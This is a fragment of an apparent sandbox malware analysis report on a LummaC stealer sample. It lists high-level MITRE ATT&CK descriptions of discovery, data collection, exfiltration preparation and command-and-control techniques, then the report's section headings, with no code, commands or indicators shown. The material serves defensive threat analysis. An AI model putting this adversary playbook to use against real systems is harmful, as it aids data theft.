Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report UmotQ1qjLq.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 106

Chrome Cache Entry: 107

Chrome Cache Entry: 108

Chrome Cache Entry: 109

Chrome Cache Entry: 110

Windows Analysis Report
UmotQ1qjLq.exe